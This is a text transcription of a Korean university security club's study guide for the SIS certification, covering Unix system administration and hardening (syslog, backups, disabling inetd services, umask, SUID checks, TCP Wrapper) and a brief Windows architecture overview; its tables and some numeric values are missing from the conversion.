< C1A4BAB8BAB8C8A3C0FCB9AEB0A120B1B3C0B020C0DAB7E E532E472E687770>
|
|
|
- 서준 단
- 9 years ago
- Views:
Transcription
1 <세종대학교 정보보호 동아리 S.S.G> SIS 정보보호 전문가 이론 학습 및 문제 풀이 세종대학교 정보보호 동아리 S.S.G security.sejong.ac.kr puresoul
2 본 자료는 세종대학교 정보보호 동아리 S.S.G의 신입생 기초 교양 교육과 더불어 SIS 정보보호 전문가를 준비하시는 모든 분들에게 조금이나마 도움이 되고자 제작되었습니다. 본 교재의 원본은 이론학습과 실력 테스트를 기본으로 만들어졌습니다. 현재는 많은 부분에 있어 의존하고 있지만 한 해 한 해 지날수록 그 버전을 높여감으로써 부족한 부분을 메우고, 잘된 부분은 더욱 발전 시켜나갈 예정입니다. 저희의 부족한 실력으로 감히 이와 같은 자료를 만든다는 것 자체가 많은 모험이고 큰 도전이지만 절대 조급해 지지 않고 한 걸음 한 걸음 나아가겠습니다. 본 자료를 가지고 공부하시는 모든분들게 조금이나마 도움이 되었으면 하는 바람입니다. S.S.G (Sejong Security Guard)는 세종대학교 컴퓨터 공학과 송상훈 교수님의 지도를 받고 있는 정보보호 동아리로서, 2000년 3월 처음 창설되어 올해도 8년째를 맞이하고 있습니다. S.S.G는 모든 동아리원들이 보안에 대한 굳은 결의로 최선의 노력을 다하고 있으며, 보안 공부에 대한 열의만은 세계 어디에도 뒤지지 않을 정도의 열의를 가지고 있습니다. S.S.G는 세종대학교 율곡관 605호에 위치하고 있으며, 자유로운 분위기 아래 각자 자신의 분야에 최선의 노력을 다하고 있습니다. 완벽한 보안이란 절대로 이룰 수 없다고 우리 모두가 공감하고 있는 현실이지만, 저희 S.S.G는 그 완벽에 조금이나마 더 가까워질 수 있도록 연구에 매진하고 있습니다. 보안이 나 하나만 잘 해서는 이루어 질 수 없는 일이기에 우리의 연구를 연구에만 한정하지 않고 정보공개, 세미나 개최 등을 통해서 보안 마인드 확산에 조금이나마 기여 하려고 노력하고 있습니다.
3 [목차] 제 1장. 시스템 보안 제 1절. 유닉스 시스템 보안 chapter 1. 유닉스 시스템 개요 chapter 2. 유닉스 시스템 관리 chapter 3. 유닉스 시스템 보안 제 2절. 윈도우 시스템 보안 chapter 1. 윈도우 시스템 개요 chapter 2. 윈도우 시스템 관리 chapter 3. 윈도우 시스템 보안 제 3절. 데이터 베이스 보안 chapter 1. 데이터 베이스 개요 chapter 2. 데이터 베이스 보안 제 4절. 시스템 보안 문제 풀이 chapter 1. 종합 문제
4 제 2장. 네트워크 보안 제 1절. 네트워크 이해 chapter 1. 네트워크 개요 chapter 2. 네트워크 토폴로지 chapter 3. OSI 참조 모델 제 2절. 침입 차단 시스템 chapter 1. 침입 차단 시스템 개요 chapter 2. 침입 차단 시스템 보안 정책 제 3절. 침임 탐지 시스템 chapter 1. 침입 탐지 시스템의 개요 chapter 2. 침입 탐지 시스템 보안 정책 chapter 3. 침입탐지 시스템 한계성 및 고려 사항 제 4절. 가상 사설망 chapter 1. 가상 사설망 개요 chapter 2. 가상 사설망 기술 제 4절. 인터넷 서비스 보안 chapter 1. WEB 보안 chapter 2. FTP 보안 chapter 3. Telnet 보안 chapter 4. 보안 chapter 5. DNS 보안 제 5절. 네트워크 보안 문제 풀이 chapter 1. 종합 문제
5 제 3장. 정보보호 개론 제 1절. 정보보호 개념 chapter 1. 정보보호 개요 chapter 2. 정보보호 목표 chapter 3. 정보보호 위협 및 대책 chapter 4. 정보보호 시스템 평가 기준 및 제도 제 2절. 정보보호 관리 chapter 1. 정보보호관리 개요 chapter 2. 정보보호관리 과정 chapter 3. 정보보호관리 체계 제 3절. 정보보호 법률 및 윤리 chapter 1. 정보보호 법률 chapter 2. 정보보호 윤리 제 4절. 정보보호 개론 문제 풀이 chapter 1. 종합 문제
6 제 4장. 암호학 제 1절. 암호 개론 chapter 1. 암호 개론 chapter 2. 암호 알고리즘 제 2절. 암호 응용 프로토콜 chapter 1. 영지식 증명 프로토콜 chapter 2. 전자 화폐 프로토콜 chapter 3. SET(전자 지불 프로토콜) chapter 4. 동전 던지기 프로토콜(Coin Flipping) chapter 5. 전자 투표 프로토콜 제 3절. 암호 응용 기술 chapter 1. PKI chapter 2. 전자서명 chapter 3. 전자봉투 chapter 4. DRM 과 워터마킹 chapter 5. PMI 제 4절. 암호학 문제 풀이 chapter 1. 종합 문제
7 제 5장. 사용자 인증 및 접근 통제 제 1절. 사용자 인증 chapter 1. 사용자 인증 개요 chapter 2. 사용자 인증 기술 제 2절. 접근 통제 chapter 1. 접근 통제 개요 chapter 2. 접근 통제 모델 chapter 3. 접근 통제 시스템 제 3절. 사용자 인증 및 접근 통제 문제 풀이 chapter 1. 종합 문제
8 제 6장. 물리적 보안 및 환경 통제 제 1절. 물리적 보안 chapter 1. 물리적 보안 개요 chapter 2. 물리적 보안 위협 chapter 3. 기타 물리적 보안 방식 제 2절. 환경적 통제 방법 chapter 1. 환경 문제 chapter 2. 시설 관리 chapter 3. 관리 통제 chapter 4. 접근 통제 제 3절. 물리적 보안 및 환경 통제 문제 풀이 chapter 1. 종합 문제
9 제 7장. 업무 지속성과 재난 복구 제 1절. 업무 지속성 계획 chapter 1. 업무 지속성 계획 개요 chapter 2. 업무 지속성 계획 관리 제 2절. 재난 복구 계획 chapter 1. 재난 복구 계획 개요 chapter 2. 재난 복구 대책 제 3절. 업무 지속성과 재난 복구 문제 풀이 chapter 1. 종합 문제
10 제 8장. 침해 사고 대응 제 1절. 취약점 이해 및 점검 chapter 1. 취약성 개념 chapter 2. 취약성 분석 chapter 3. 취약성 점검 제 2절. 공격 유형 이해 및 분석 chapter 1. 공격 기법 분류 chapter 2. 해킹 공격 절차 chapter 3. 해킹 공격 기술 제 3절. 악성 프로그램 이해 및 대응 chapter 1. 악성 프로그램 개념 chapter 2. 악성 프로그램 유형 제 4절. 침해 사고 및 대응 chapter 1. 침해 사고 분석 chapter 2. 침해 사고 대응 제 5절. 침해 사고 대응 문제 풀이 chapter 1. 종합 문제
11 제 1장. 시스템 보안 제 1절. 유닉스 시스템 보안 chapter 1. 유닉스 시스템 개요 chapter 2. 유닉스 시스템 관리 chapter 3. 유닉스 시스템 보안 제 2절. 윈도우 시스템 보안 chapter 1. 윈도우 시스템 개요 chapter 2. 윈도우 시스템 관리 chapter 3. 윈도우 시스템 보안 제 3절. 데이터 베이스 보안 chapter 1. 데이터 베이스 개요 chapter 2. 데이터 베이스 보안 제 4절. 시스템 보안 문제 풀이 chapter 1. 종합 문제 11
12 제 1 절. 유닉스 시스템 보안 chapter 1. 유닉스 시스템 개요 가. 유닉스 시스템 역사 유닉스 시스템은 1960년대 후반에 AT&T사의 Bell 연구소에서 개발한 Multics라는 이름을 가진 운영 체제에서 그 뿌리를 찾을 수 있다. 그 후 본격적으로 유닉스 시스템의 개발에 착수한 사람은 Ken Thompson으로 DEC사의 PDP-7용 OS를 Assembly로 개발하여 초기 유닉스 시스템 발전의 기초를 만 들었으며, 1973년 Dennis Ritchie가 이식성이 뛰어난 C언어로 유닉스 시스템을 재작성함으로써 본격적 인 유닉스 시대의 장을 만들게 되었다. 나. 유닉스 시스템 핵심 구조 유닉스 시스템은 크게 커널, 쉘, 파일시스템 3가지 핵심 구조로 구성되며 다음 [표 4-1]은 유닉스 시스템의 핵심 구조에 대한 간단한 설명이다. 12
13 (1) 커널(Kernel) 사용자 프로그램들은 경우에 따라 시스템의 하드웨어나 소프트웨어의 자원을 액세스하게 되는데 커널 은 이러한 사용자 프로그램을 관리하는 부분을 말한다. 커널은 크게 프로세스, 메모리, 입출력(I/O) 그 리고 파일 관리의 네 부분으로 나누어 생각할 수 있으며 이러한 서브시스템은 각기 독립적으로 사용자 프로그램에 의해서 의도되는 서비스를 올바르게 제공하기 위해서 상호 협동적으로 작동하게 된다. 또 한 커널은 쉘과 상호 연관되어 있어서 쉘에서 지시한 작업을 수행하고 결과물을 돌려보낸다. (2) 쉘(Shell) 쉘은 유닉스 시스템과 사용자 사이의 인터페이스를 제공하는 것을 말한다. 즉, 사용자가 문자열들을 입력하면 그것을 해석하여 그에 따르는 명령어를 찾아서 커널에 알맞은 작업을 요청하게 된다. 쉘은 종류에 따라 전통적으로 Bourne 쉘, C 쉘, Korn 쉘 등으로 구분된다. o Bourne 쉘(/bin/sh, $): AT&T의 유닉스 환경을 위해 개발되었으며, 대부분의 유닉스에서 제공하는 기본 쉘이다. 빠른 수행과 최소한의 자원만을 요구하는 것이 특징이다. o C 쉘(/bin/csh, %): 사용법이 C 언어와 유사하며, Korn 쉘, Bourne 쉘과 기본적으로 유사한 특성을 가지고 있으나 대형 시스템을 목표로 설계되었기 때문에 명령어의 용어와 문법적 구조는 다르다. o Korn 쉘(/bin/ksh, $) : 벨 연구소의 David Korn에 의해 제작되었으며, Bourne 쉘을 포함하며, aliasing, history, command line editing 같은 특성이 추가되었다. (3) 파일 시스템(File System) 유닉스의 최상위 레벨의 디렉터리인 root는 / 로 시작하여 하위에 다음과 같은 디렉터리 계층구조를 이룬다. /dev : 디바이스 파일을 주로 포함하는 디렉터리 /etc : 시스템 관리를 위한 파일을 포함하는 디렉터리(passwd, hosts, rc 등의 파일 포함) /sbin : Standalone binary 파일을 포함하는 디렉터리(시스템의 시작에 필요한 init, mount, sh 등) /tmp : 임시 디렉터리 /bin : 시스템 바이너리 파일을 포함하는 디렉터리 /lib : 시스템 라이브러리 파일을 포함하는 디렉터리(유틸리티, 패키지 등 포함) /var : 계정 정보와 계정 관리 및 시스템 통계 등에 관한 디렉터리 /usr : 각종 실행 프로그램이나 온라인 매뉴얼 등을 포함하는 디렉터리 13
14 다. 유닉스 시스템 부팅 절차와 실행 단계 (1) 유닉스 시스템 부팅 절차 o 시스템 초기화 o Bootstrap disk에 있는 첫 블록을 옮겨 그 코드(code)를 실행 o Bootstrap loader는 유닉스 파일을 찾아서 메모리에 옮겨, 처리하여 수행 o 유닉스 파일은 몇몇 하드웨어 인터페이스를 초기화 o 초기화 작업이 끝난 후에 프로세스 0을 수행 o 프로세스 0을 만들어 초기화한 후 시스템은 프로세스 0을 복제함으로써 프로세스 1을 생성 o 앞 단계까지 성공적으로 수행한 경우, 정상적인 스케줄링 수행 o init 프로세스인 프로세스 1이 수행이 되면 exec system call을 하게 되는데 이 시스템콜은 프로세스 1의 code 명령에 파일 /etc/init를 읽어 들임 o getty 프로세스는 다음과 같이 처리됨 - communication line connection, exec login o login 프로세스 - 사용자 ID/패스워드 검증, 쉘 실행 (2) 유닉스 시스템 실행 단계 System V 계열의 유닉스 시스템은 실행 단계(Run Level)별로 다음 [표 4-2]와 같은 단계를 포함하며, init 명령어를 통하여 사용자가 통제할 수 있다. 14
15 chapter 2. 유닉스 시스템 관리 가. 유닉스 시스템 로그 관리 다음 [표 4-3]은 유닉스 시스템에서의 중요 로그 파일을 설명한 것이다. (1) syslog 로깅 주체(facility) syslog 로깅 주체(facility)는 로그 정보를 요청한 프로그램 종류로 구분되며, syslog 로깅 주체별 로그 대상 사건은 다음 [표 4-4]와 같다. 15
16 (2)syslog 레벨 syslog 레벨(level)은 심각성(severity) 레벨을 의미하는데 다음 [표 4-5]와 같은 단계로 구분 지을 수 있 다. 심각성 레벨은 심각도에 따라 emerg > alert > crit > err > warn > notice > info > debug 순이다. 16
17 (3) syslog 설정 구문(/etc/syslog.conf) 주의할 점은 mark를 제외한 나머지 레벨은 *.alert, *.debug 등과 같이 facility를 와일드카드(wild card, *)를 사용하여 나타낼 수 있지만, mark의 경우에는 와일드카드를 사용할 수 없다는 것이다. 다음 [표 4-6]은 /etc/syslog.conf 설정 구문에 대한 설명이다. 17
18 나. 유닉스 시스템 백업 및 복구 보안 침입자에 의해 시스템의 데이터가 변조되거나 파괴되었을 때, 가장 안전하고 정확한 복구 방법은 백업 및 복구대책이다. (1) 백업 대책 o 백업 대상 분류 : 전체, 중요 파일, 로그파일 등 기준에 의하여 백업 대상을 지정하는 것 o 백업 주기 : 현재 수행하고 있는 백업의 주기는 일/주/월 단위 및 수시 백업으로 분류 o 백업 종류 : 다음 [표 4-7]과 같다 (2) 복구 대책(침해사고 또는 장애 등에 대한 복구 대책) o 복구 우선순위: 본질적 업무 기능(30분 이내), 중요 업무 기능(24시간 이내), 부가 업무 기능(48시간 이내) 등으로 분류 o 목표 복구 수준: 특정 백업 시점, 전일 백업 시점의 데이터로 복구 - 특정 백업시점(I), 전일백업 시점(D) o 목표 복구 시간: 30분 이내, 3시간 이내, 24시간 이내, 48시간 이내로 분류 18
19 (3) 백업과 복구 유닉스 명령어 #ufsdump options : 백업 0-9 : 0: full dump, 1~9: incremental backup u : /etc/dumpdates에 write, incremental backup 가능하도록 처리 f : device 장치 명시, 디폴트는 tape v : view # ufsrestore : 복구 (4) 불필요한 서비스의 제거 시스템 운영에서 불필요한 서비스 제거를 위하여 다음 절차를 수행한다. o #netstat -an 을 통하여 현재 사용, 준비하고 있는 서비스 포트를 확인한다. Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp : :* LISTEN tcp : :* LISTEN tcp : :* LISTEN tcp : :* LISTEN tcp : :* LISTEN 명령어의 실행 결과에서 LISTEN으로 응답하는 포트는 외부사용자가 접속할 수 있는 경로를 제공하는 서비스 포트로서, 현재 사용 중임을 의미한다. 따라서 반드시 사용 유무를 확인하여 제거해야 한다. o #netstat -an 의 처리 결과 LISTEN 상태인 서비스 포트의 내용을 /etc/services 파일의 내용과 비교 하여 서비스 포트의 내용을 참조한다. 그리고 /etc/inetd.conf 파일에서 해당 서비스 항목의 첫 라인에 주석 처리한다.(#을 해당 라인에 삽입) 19
20 stkim]$ more /etc/inetd.conf # /27/93 # # Echo, discard, daytime, and chargen are used primarily for testing. #echo stream tcp nowait root internal #echo dgram udp wait root internal #discard stream tcp nowait root internal #discard dgram udp wait root internal #daytime stream tcp nowait root internal #daytime dgram udp wait root internal #chargen stream tcp nowait root internal #chargen dgram udp wait root internal #time stream tcp nowait root internal # These are standard services. # 첫 라인에 #이 삽입되면 주석으로 인식되어 해당 서비스 포트의 사용을 제거함 ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd # Shell, login, exec, comsat and talk are BSD protocols. #shell stream tcp nowait root /usr/sbin/tcpd in.rshd #login stream tcp nowait root /usr/sbin/tcpd in.rlogind #exec stream tcp nowait root /usr/sbin/tcpd in.rexecd #comsat dgram udp wait root /usr/sbin/tcpd in.comsat o ps ef grep inetd 의 명령어를 사용하여 현재 사용 중인 서비스 포트들을 총괄적으로 관리하는 인터넷 슈퍼 데몬의 프로세스 ID를 확인한다. [stkim@insert stkim]$ ps ef grep inetd root :01? 00:00:00 inetd o kill HUP 318(inetd s Process ID) 인터넷 슈퍼 데몬을 재수행하여 /etc/inetd.conf 파일에서 사용을 금지하도록 설정한 서비스 포트의 상태를 재인식하도록 명령한다. o netstat an 명령어를 사용하여 해당 서비스 포트에 대한 결과값이 나타나지 않았다면 조치가 완료된 것이다. 20
21 다음 [표 4-8]은 유닉스 시스템에서 일반적으로 정의된 서비스를 정리한 것이다. 21
22 (5) 유닉스 시스템 프로세스 관리 'ps' 명령은 유닉스 시스템에서 현재 구동 중인 프로세스를 확인하는 명령으로 'kill' 명령을 통해 강제 적으로 구동 중인 프로세스를 정지할 수 있다. o 관련 명령어 - ps ef : 프로세스 확인 명령 - kill PID, killall PID : 프로세스 정지 명령 - kill -15 PID : default signal 제거 - kill -9 PID : 프로세스 강제 제거 - pgrep lf sendmail : 프로세스 실행 확인 명령 - pkill sendmail : 프로세스 정지 명령 라. 유닉스 배치 작업(at, cron) (1) at 설정 #at 시 15분에 특정한 job(shell_script_file)을 수행하도록 처리한다. #/var/spool/cron/crontabs 파일을 수정하여 주기적으로 job을 수행하도록 한다. 명령어는 full path을 지정해야 한다. (2) cron 설정 crontab 파일 구문(syntax)은 minute hour day_of_month month weekday command"이다. o crontab 파일 구문- minute(분) : 0 ~ 59 - hour(시) : 0 ~ 23 - day_of_month (일) : 1 ~ 31 - month(월) : 1 ~ 12 - weekday(요일) : 일요일부터 토요일까지를 나타내는 0 ~ 6 - command(명령) : 실행 명령 예를 들어, 0 0 * * 0 /bin/myjob.sh 은 매월 일요일 0시 0분에 /bin/myjob.sh 명령어를 실행하라는 뜻이다. 22
23 마. 유닉스 시스템 패키지/패치 관리 (1) 유닉스 시스템 패키지 관리 유닉스 시스템에서의 소프트웨어를 패키지라고 말하며, 이것을 설치하는 것을 패키지를 설치한다. 라고 한다. 다음은 패키지 관련 명령어이다. o pkginfo -d /cdrom/~ : 시스템에 설치된 패키지 정보를 확인한다. -d 옵션을 사용하여 서브 디렉터리의 패키지 정보를 볼 수 있다. o pkgadd -d /cdrom/~ : /cdrom/~ 디렉터리에 존재하는 소프트웨어를 설치한다. o pkgadd -d /cdrom/~ -s /pkg : -s 옵션은 저장할 곳을 지정하는 옵션이다. o pkgrm pkg_name : 패키지를 삭제한다. o pkgchk pkg_nameo pkginfo 등 (2) 유닉스 시스템 패치 관리 다음과 같은 절차로 패치를 설치한다. o ftp sunsolve.sun.com에서 다운받는다. - /pub/patches : patch 파일, readme 파일을 다운받는다. o /usr/bin/unzip./xxxx.zip : 압축을 푼다. o zcat/gzcat : 압축을 푼다.- zcat xxx.tar.z tar -xvf - >> 결과: xxx - gzcat o patchadd 명령어를 이용하여 패치 설치(필요한 경우 삭제) - patchadd xxxx : 패치 설치 o 설치된 패치 삭제(불필요한 경우 삭제) - patchrm xxxx : 설치된 패치 삭제 23
24 chapter 3. 유닉스 시스템 보안 가. 유닉스 시스템 계정 보안 (1) 기본 개요 패스워드는 사용자가 기억하기 용이하게 작성하되, 타인이 유추하기 어렵게 작성해야한다. (2) 작성 규칙 패스워드는 반드시 숫자와 문자가 조합된 6자리 이상으로 규정하며, 일련번호, 주민등록번호, 계정과 유사 등 유추 가능한 패스워드의 사용을 금지한다. (3) 패스워드 부여 절차 o 신규계정 생성 시 보안 관리자가 초기 패스워드를 일괄 부여하며 사용자가 최초 로그인 시 변경하도록 규정한다. o 패스워드 분실, 변경, 재발급은 정의된 절차와 규정에 따라 보안 관리한다. (4) 패스워드 관리 o 정보보호 정책의 패스워드 관리지침 준수 o 계정 및 패스워드 유출로 인한 보안 침해사고의 궁극적인 책임은 개인에게 있음을 인식 o 쉽게 유추할 수 없는 패스워드 설정 o 주기적인 패스워드 변경 규정의 준수 다음 [표 4-9]는 유닉스 시스템 계정 설정과 관련된 파일이다. 24
25 나. 쉘 보안 (1) 쉘 종류 및 특징 쉘은 사용자와 운영체체 커널 사이에 위치하는 명령어 해석기를 말한다. o C 쉘(Berkeley 유닉스 C 쉘):.cshrc 파일에 사용자가 필요로 하는 환경 변수를 저장하여 사용자가 로그인할 때 지정한 명령들을 자동으로 수행케 함으로써, 사용자의 작업 환경을 편리하게 지정할 수 있다. o Bourne 쉘:.profile 파일에 환경 변수를 저장함으로써, 사용자의 작업 환경을 편리하게 한다..profile 파일은 C 쉘의.cshrc 파일과 같은 역할을 한다. o Korn 쉘:.kshrc 또는.profile 파일에 환경 변수를 저장하여 사용자의 작업 환경을 편리하게 한다. C 쉘과 TC 쉘의 기능을 모두 제공하며, 쉘 스크립트 언어는 Bourne 쉘과 비슷하다. (2) 쉘의 환경 파일 파일명이. 으로 시작하기 때문에 숨김 파일/도트 파일(ls 명령에 나타나지 않음), 초기화 파일/선행 파일(사용자 로그인 시 먼저 실행), 환경파일(사용자의 환경설정이 정의되어 있음)로 불린다. 다음은 환경파일에 대한 설명이다. o.login: 특정 쉘에 관계없는 초기 사용자환경을 지정하여 로그인할 때 지정한 명령들을 자동으로 수행 o.logout: 시스템 접속을 종료하기 전에 마지막으로 수행될 내용 지정 파일 o.forward: 자신에게 온 전자우편을 다른 곳으로 그대로 전송하기 위한 파일 o.gopher: Gopher에서 사용하는 디렉터리 o.history: 쉘을 사용할 때 수행한 명령어의 일부를 저장하는 파일 o.ncrecent: ncftp 사용할 때 최근에 접속한 곳의 주소 및 위치 저장 파일 o.newsrc: USENET News Group 이용 시 그룹 환경 저장 파일 o.plan: finger용으로 자신의 정보나 계획을 적어 외부에 공개하는 파일 o.rhosts: rlogin을 이용하여 시스템에 접속할 때 암호를 묻지 않고 자동으로 접속할 수 있는 서버 및 사용자를 지정하는 파일 25
26 아래 [표 4-10]은 각 쉘에 따른 환경 파일을 정리한 것이다. 아래 [표 4-11]은 환경 파일에서의 변수 설정에 대한 설명이다. 26
27 다. 유닉스 파일 시스템 보안 (1) 파일 시스템 개요 o 유닉스 파일 시스템은 유닉스 커널 프로그램과 프로그램 실행에 필요한 시스템 파일 및 사용자 데이터 파일로 구성됨 o 개인 저장장소를 제공하고 정보를 여러 사용자가 사용, 공유할 수 있는 수단을 제공 o 여러 가지 정보를 저장하는 기본적인 구조 o 디스크 공간에 독립된 공간 구축 가능 o 독립된 파일 시스템은 다른 파일 시스템으로부터 독립적으로 존재 다음 [표 4-12]는 파일 시스템 종류에 대한 설명이다. 27
28 다음 [표 4-13]은 파일 시스템 구조에 대한 설명이다. (2) umask를 이용한 파일권한 설정 새롭게 생성되는 파일이나 디렉터리는 디폴트 권한으로 생성된다. 이러한 디폴트 권한은 umask 값에 의해서 결정되는데, 이 권한은 부모 프로세스나 로그인 쉘에 의해 상속받는다. 따라서 umask 값이 안전하지 않은 권한으로 설정된 경우, 허가되지 않은 사용자에게까지 파일이나 프 로세스에 접근이 허락되어 보안 상 큰 위협 요소가 될 수 있다. 시스템의 기본값으로 umask는 시스템 환경파일인 /etc/profile 파일에 022로 설정되어 있다. 보안을 강화하기 위하여 시스템 환경파일 (/etc/profile)과 각 사용자별 홈 디렉터리 내 환경파일($HOME/.profile)에 umask값을 027 또는 077 로 변경하는 것을 권장한다. 28
29 umask 값의 변경에 따라 새롭게 생성되는 파일의 권한은 소유자(owner), 그룹(group), 다른 사용자 (others)별로 아래 [표 4-14]와 같이 적용된다. (3) 특수 권한(setuid, setgid)파일의 관리 SUID(Set UID), SGID(Set GID)은 실행 파일이 슈퍼유저(root)나 다른 상위 사용자의 권한으로 수행될 수 있도록 규정한 특별한 파일권한 설정 비트이다. 또한 상위 권한으로 실행되는 특징 때문에 시스템 해킹의 주요 수단으로 악용되며, 프로그램 파일에 버그가 존재할 경우 불법 권한 획득에 이용될 수 있 는 심각한 보안 위협이 될 수 있다. 즉 일반 사용자가 SUID, SGID 설정을 통해 특정 슈퍼 유저의 권한 을 위임받아 특정 명령을 실행시킬 수 있다. o setuid: 실행 파일에 사용됨(예, /etc/passwd)o setgid: 같은 project에 실행 권한을 주기 위해서 setgid 사용(예, sys) o sticky bit: 디렉터리에 인가된 사용자만 쓰기(write) 가능하도록 하기 위해서 디렉터리 자체에 설정 (예, /var/tmp - 모든 사용자가 사용 가능하지만, 삭제는 파일의 소유자만 가능함(root는 예외)) 다음 [표 4-15]는 특수권한 파일의 설정 및 검색과 관련된 명령이다. find / -perm print : suid, sgid, sticky 비트가 모두 설정된 파일을 검사 find / -perm print : suid, sgid가 설정된 파일을 검사 29
30 (라) 보안 관리에 사용되는 주요 명령어 다음 [표 4-16]은 보안 관리와 관련된 주요 명령어에 대해 정리한 것이다. 30
31 (마) 보안 관리를 위한 중요 유닉스 파일과 명령어 보안 관리를 위한 중요 대상 파일은 네트워크 설정 관련, 신뢰관계 설정 관련, 배치작업 관련, 감사추 적(로깅) 관련 항목으로 구분하여 중요 파일을 기술한다. 다음 [표 4-17]은 네트워크 설정과 관련된 파일이다. 다음 [표 4-18]은 신뢰관계 설정과 관련된 파일이다. 31
32 다음 [표 4-19]는 배치작업 설정과 관련된 파일이다. 다음 [표 4-20]은 로그 파일에 대해 정리한 것이다. (바) 보안 강화 도구 보안 강화 도구 중 대부분은 사용 목적에 따라 보안 관리자를 위한 보안강화 도구로 사용되거나 공격 자에 의한 침입 도구로 사용될 수 있다. 보안 도구에 대한 자세한 사항은 8장의 침해사고 대응 에서 소개한 도구의 설명을 참조하고 여기에서는 정보보호관리에 사용되는 보안 강화 도구의 사용 목적에 따른 분류 기준을 이해하도록 한다. 32
33 다음 [표 4-21]은 보안 강화 도구를 사용목적에 따라 분류하여 정리한 것이다. (1) TCP Wrapper TCP Wrapper는 인터넷 슈퍼데몬인 inetd 데몬에 의해 구동되는 네트워크 서비스(예를 들어 ftp, telnet, rlogin, rsh, exec, tftp, talk, systat, finger 등)들에 대한 접근 통제와 사용된 서비스별 로그를 기 록할 수 있는 보안강화 도구이다. TCP Wrapper는 시스템에 존재하는 소프트웨어나 설정 파일을 바꿀 필요가 없으며 클라이언트와 서버 응용 프로그램 사이의 실질적인 통신에 부하를 주지 않는다. TCP Wrapper는 /etc/inetd.conf에 정의되고 inetd 데몬에 의해 통제되는 네트워크 서비스를 통제하기 위하여 inetd 데몬과 네트워크 서비스데몬(in.telnetd, in.ftpd, in.rlogind 등) 사이에 tcpd 데몬을 구동하 여 네트워크 서비스의 사용에 대한 접근 제어와 로그 기록 기능을 한다. o 접근 제어 - TCP Wrapper의 접근제어는 /etc/hosts.allow 파일과 /etc/hosts.deny 파일에 의하여 이루어진다. 접근 제어에 사용되는 두 파일 중에서 tcpd가 먼저 검색하는 것은 hosts.allow 파일이다. 그러므로 hosts.allow 파일에 접근을 허가하는 호스트를 적어두고, hosts.deny 파일에는 ALL을 적어두면 허가된 호스트만이 시스템에 원격으로 접근할 수 있다. o 로그 기록- TCP Wrapper(tcpd)는 syslog 데몬을 사용하며 telnet, ftp, rexec,,rsh, rlogin, tftp, talk 등에 대한 접근 로그를 기록하며 기본적으로 /var/log/syslog 파일에 저장된다. 다른 파일로 변경하려면 /etc/syslog.conf 파일에서 설정을 수정하면 된다. 33
34 (2) CGI Wrapper TCP_Wrapper가 유닉스 서버의 네트워크 서비스(예, Telnet, rlogin, ftp 등)에 대한 접근 통제를 위한 보안도구라면 CGI Wrapper는 웹서비스의 CGI를 보호하는 웹서버 보안강화 도구이다. CGI Wrapper는 웹서버의 자식 프로세스들이 모두 nobody 권한으로 실행되었을 때 발생하는 문제점을 보완하기 위하여 만들어진 것이다. CGI Wrapper는 CGI 프로그램이 위치한 디렉터리의 소유자 권한으 로 CGI 프로그램을 실행시킨다. 따라서 모든 CGI가 nobody로 실행되는 것이 아니며, 모든 CGI는 CGI 프로그램 자신의 소유로 실행이 되는 것이다. 그리고 CGI Wrapper는 실행시킬 CGI 프로그램이 위치한 디렉터리 소유자와 CGI 프로그 램의 소유자를 비교하여 같을 때에만 실행시키며, 다를 때에는 실행시키지 않도록 동작함으로써 CGI에 서 발생되는 취약성을 보완한다. 34
35 (사) OS 별 주요 유닉스 명령어 다음 [표 4-22]에서 [표 4-27]은 OS 별로 주요 유닉스 명령어를 비교한 것이다. 35
36 36
37 37
38 38
39 39
40 40
41 제 2절. 윈도우시스템 보안 chapter 1. 윈도우 시스템 개요 가. 윈도우 시스템 구조 윈도우 시스템은 모듈식 구조를 사용한다. 모듈식 구조는 윈도우에 포함되어 있는 각 컴포넌트와 모듈 이 설계상의 목적인 각 기능에 대해서 단독적으로 책임을 진다는 것이다. 또한 하나의 모듈은 다른 모 듈이 수행하는 기능을 결코 반복하지 않는다. 이러한 모듈식 구조는 새로운 구성 요소의 추가로 인한 확장성이 쉽다는 장점이 있다. 나. 윈도우 모드 (1) 윈도우 사용자 모드 윈도우 사용자 모드는 사용자들의 어플리케이션과 서브시스템들이 실행되는 공간이다. 사용자 모드의 어플리케이션은 하드웨어 자원으로부터 분리되고 어플리케이션이 접근할 수 있는 메모리 공간을 제한 받게 된다. 이러한 이유로 커널 모드로부터 어플리케이션을 격리시킴으로써 어플리케이션이 시스템을 파괴할 가능성을 줄이고 권한 없는 사용자들이 접근하지 못하도록 하는 것이다. o 사용자 모드의 주요 서브시스템윈도우 서브시스템은 부팅 시 윈도우로부터 만들어지는 사용자의 모든 프로세스이며 이것은 한번 만들어지면 지속적으로 응용프로그램 프로세스와또 다른 서브 시스템에 보내진 메시지에 의해 실행된다. 다음 [표 4-28]은 사용자 모두의 주요 서브시스템에 대해 정리한 것이다. 이러한 로그온 프로세스는 데이터를 보호하고 불의의 사고를 막기 위해서 사용자를 제한하기 위해 사 용된다. 이러한 보안 서브시스템(Security Subsystem)은 윈도우에 접근하려는 사용자에게 사용 인증을 할 수 있도록 한다. 41
42 (2) 윈도우 커널 모드 윈도우 운영체제는 흔히 선점형(Preemptive) 멀티태스킹 운영체제라 하는데 이것은 여러 프로그램을 실행시켜서 작업하고 있지만 실제 프로세서는 한 번에 한 가지 작업을 실행시킨다는 것이다. 이렇게 하나의 프로세서가 여러 개의 작업을 동시에 수행하기 위해서는 이러한 작업들 간에 스케줄을 처리하 기 위한 것이 존재해야 하고 이러한 역할을 하는 것이 바로 커널(Ntoskrnl.exe)이다. 커널은 메모리를 할당하고 출력(I/O) 장치와 통신하기 때문이다. 다음 [표 4-29]는 윈도우 커널 모드의 서브시스템에 대한 설명이다. 42
43 다. 윈도우 파일 시스템 다음 [표 4-30]에서와 같이 윈도우 파일 시스템은 크게 FAT과 NTFS 로 구분할 수 있다. 라. 윈도우 시스템 시작 및 복구 한 시스템에 여러 운영체제를 설치하게 되면 이중 부팅이 가능하게 되는데 항상 가장 늦게 설치한 운 영체제가 기본 운영체제가 된다. 운영체제의 변경 방법에는 'c:\boot.ini'를 직접 편집하는 방법과 [시작] - [제어판] [시스템]의 [고급] 탭 내 [시작 및 복구]창에서 변경하는 방법이 있다. 43
